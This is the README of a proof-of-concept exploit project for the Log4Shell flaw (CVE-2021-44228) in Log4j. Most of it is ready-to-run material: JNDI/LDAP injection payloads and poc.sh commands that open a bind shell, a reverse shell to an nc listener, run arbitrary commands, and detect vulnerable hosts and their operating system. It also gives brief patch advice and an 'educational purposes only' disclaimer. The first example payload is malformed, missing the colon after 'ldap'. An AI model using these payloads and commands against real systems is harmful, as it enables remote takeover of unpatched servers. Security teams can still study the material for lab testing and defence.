PoC for CVE-2021-44228.
Project made for EDUCATIONAL PURPOSES ONLY.
This project creates two servers: http and ldap. Both are necessary for exploit to work. Specified java file is compiled and servers are started in Dockerfile. Payload is shown to user - it has to be passed to vulnerable application.
Example payload:
${jndi:ldap//127.0.0.1:1389/a}
- Bind shell
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e bind --remote-port 4445- Reverse shell
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e reverse --listener-port 4444- RCE
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e rce --cmd 'ls | tee log.txt'- Time based vulnerability detection
It sleeps program for 25 seconds
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e vulndetect- OS detection
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e osdetect --listener-port 4444OS detection may return 4 letters:
Lfor LinuxWfor WindowsMfor MacOSUfor unknown
Bypass technique was published. Example here
App was designed to show how it works. To build and run jar with an app use:
./build_vuln_app.sh
java -jar vulnapp/target/vulnapp.jar 'PAYLOAD'where PAYLOAD is returned from ./poc.sh script (e.g. ${jndi:ldap://127.0.0.1:1389/1}).
Some credits for projects and websites that were used during creation of this exploit:
- https://github.com/shanfenglan/apache_log4j_poc
- https://github.com/ivan-sincek/java-reverse-tcp
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://github.com/RandomRobbieBF/marshalsec-jar
Start app using log4j with log4j2.formatMsgNoLookups set to true, or update to log4j-2.15.0-rc1 or later. Updates are there in the wild - implement them as soon as possible.
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.